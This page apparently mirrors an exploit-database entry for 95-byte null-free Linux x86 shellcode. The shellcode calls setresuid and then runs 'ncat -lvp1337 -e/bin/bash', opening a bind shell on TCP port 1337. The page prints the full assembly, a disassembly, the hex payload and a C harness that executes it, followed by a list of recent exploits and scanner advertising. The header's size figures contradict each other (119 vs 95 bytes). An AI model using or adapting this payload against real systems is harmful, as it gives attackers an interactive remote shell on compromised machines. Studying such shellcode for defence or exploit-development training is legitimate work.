linuxx86 bind (1337tcp) ncat (usrbinncat) shell (binbash) + nullfree shellcode (95 bytes)

▸▸▸ Exploit & Vulnerability >> shellcode exploit & linux_x86 vulnerability

Online Vulnerability Scanner Tools

Code...

				
/* 
   Linux/x86-execve(/usr/bin/ncat -lvp 1337 -e/bin/bash)+NULL-FREE Shellcode(95 bytes)
   Author : T3jv1l
   Contact: t3jv1l@gmail.com
   Twitter:https://twitter.com/T3jv1l
   Shellcode len : 119 bytes
   Compilation: gcc  shellcode.c -o shellcode
   Compilation for x64 : gcc -m32 shellcode.c -o shellcode
   Tested On: Ubuntu 16.04.5 LTS 
   Arch: x86
   Size: 95 bytes
   Thanks for helping NytroRST


############################################################################
global _start:
_start:
jmp short todo


shellcode:

xor eax, eax            ;Zero out eax
xor ebx, ebx            ;Zero out ebx 
xor ecx, ecx            ;Zero out ecx
cdq	      		;Zero out edx using the sign bit from eax
mov BYTE al, 0xa4       ;Setresuid syscall 164 (0xa4)
int 0x80                ;Syscall execute
pop esi                 ;Esi contain the string in db
xor eax, eax            ;Zero out eax
mov[esi+13], al         ;Null terminate /usr/bin/ncat
mov[esi+22], al         ;Null terminate -lvp1337
mov[esi+34], al         ;Null terminate -e/bin/bash
mov[esi+35], esi        ;Store address of /usr/bin/ncat in AAAA
lea ebx, [esi+14]       ;Load address of -lvp1337
mov[esi+39], ebx        ;Store address of -lvp1337 in BBBB taken from ebx
lea ebx, [esi+23]       ;Load address of -e/bin/bash into ebx
mov[esi+43], ebx        ;Store address of -e/bin/bash in CCCC taken from ebx
mov[esi+47], eax        ;Zero out DDDD
mov al, 11              ;11 is execve syscall number 
mov ebx, esi            ;Store address of /usr/bin/ncat
lea ecx, [esi+35]       ;Load address of ptr to argv[] array
lea edx, [esi+47]       ;envp[] NULL
int 0x80                ;Syscall execute

todo:
call shellcode
db '/usr/bin/ncat#-lvp1337#-e/bin/bash#AAAABBBBCCCCDDDD'
;   012345678901234567890123456789012345678901234567890

######################################################################################

ncat.o:     file format elf32-i386


Disassembly of section .text:

00000000 <_start>:
   0:	eb 35                	jmp    37 <todo>

00000002 <shellcode>:
   2:	31 c0                	xor    %eax,%eax
   4:	31 db                	xor    %ebx,%ebx
   6:	31 c9                	xor    %ecx,%ecx
   8:	99                   	cltd   
   9:	b0 a4                	mov    $0xa4,%al
   b:	cd 80                	int    $0x80
   d:	5e                   	pop    %esi
   e:	31 c0                	xor    %eax,%eax
  10:	88 46 0d             	mov    %al,0xd(%esi)
  13:	88 46 16             	mov    %al,0x16(%esi)
  16:	88 46 22             	mov    %al,0x22(%esi)
  19:	89 76 23             	mov    %esi,0x23(%esi)
  1c:	8d 5e 0e             	lea    0xe(%esi),%ebx
  1f:	89 5e 27             	mov    %ebx,0x27(%esi)
  22:	8d 5e 17             	lea    0x17(%esi),%ebx
  25:	89 5e 2b             	mov    %ebx,0x2b(%esi)
  28:	89 46 2f             	mov    %eax,0x2f(%esi)
  2b:	b0 0b                	mov    $0xb,%al
  2d:	89 f3                	mov    %esi,%ebx
  2f:	8d 4e 23             	lea    0x23(%esi),%ecx
  32:	8d 56 2f             	lea    0x2f(%esi),%edx
  35:	cd 80                	int    $0x80

00000037 <todo>:
  37:	e8 c6 ff ff ff       	call   2 <shellcode>
  3c:	2f                   	das    
  3d:	75 73                	jne    b2 <todo+0x7b>
  3f:	72 2f                	jb     70 <todo+0x39>
  41:	62 69 6e             	bound  %ebp,0x6e(%ecx)
  44:	2f                   	das    
  45:	6e                   	outsb  %ds:(%esi),(%dx)
  46:	63 61 74             	arpl   %sp,0x74(%ecx)
  49:	23 2d 6c 76 70 31    	and    0x3170766c,%ebp
  4f:	33 33                	xor    (%ebx),%esi
  51:	37                   	aaa    
  52:	23 2d 65 2f 62 69    	and    0x69622f65,%ebp
  58:	6e                   	outsb  %ds:(%esi),(%dx)
  59:	2f                   	das    
  5a:	62 61 73             	bound  %esp,0x73(%ecx)
  5d:	68 23 41 41 41       	push   $0x41414123
  62:	41                   	inc    %ecx
  63:	42                   	inc    %edx
  64:	42                   	inc    %edx
  65:	42                   	inc    %edx
  66:	42                   	inc    %edx
  67:	43                   	inc    %ebx
  68:	43                   	inc    %ebx
  69:	43                   	inc    %ebx
  6a:	43                   	inc    %ebx
  6b:	44                   	inc    %esp
  6c:	44                   	inc    %esp
  6d:	44                   	inc    %esp
  6e:	44                   	inc    %esp
###################################################################################
*/

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int (*shellcodetotest)();

char shellcode[] = "\xeb\x35\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x5e\x31\xc0\x88\x46\x0d\x88\x46\x16\x88\x46\x22\x89\x76\x23\x8d\x5e\x0e\x89\x5e\x27\x8d\x5e\x17\x89\x5e\x2b\x89\x46\x2f\xb0\x0b\x89\xf3\x8d\x4e\x23\x8d\x56\x2f\xcd\x80\xe8\xc6\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x6e\x63\x61\x74\x23\x2d\x6c\x76\x70\x31\x33\x33\x37\x23\x2d\x65\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x23";
 


int main(int argc, char **argv) {
	void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
	if(ptr == MAP_FAILED){
		perror("mmap");
		exit(-1);
printf("Shellcode Length:  %d\n", strlen(shellcode));
	}


	memcpy(ptr, shellcode, sizeof(shellcode));
	shellcodetotest = ptr;
	shellcodetotest();
	return 0;


}

Linuxx86 bind (1337tcp) ncat (usrbinncat) shell (binbash) + nullfree shellcode (95 bytes) Vulnerability / Exploit Source : Linuxx86 bind (1337tcp) ncat (usrbinncat) shell (binbash) + nullfree shellcode (95 bytes)

Last Vulnerability or Exploits

▸ gitlab 14.9 - stored cross-site scripting (xss) ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ gitlab 14.9 - authentication bypass ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ easeus data recovery - 'ensserver.exe' unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

▸ ptpublisher v2.3.4 - unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Discover posible vulnerabilities before GO LIVE with your project
Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Do an audit to find and close the high risk issues before having a real damage and increase the costs
Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Bypass your network restrictions and scan from our IP for relevant results
Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Scan your website from any device with internet connection

Tusted by

Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.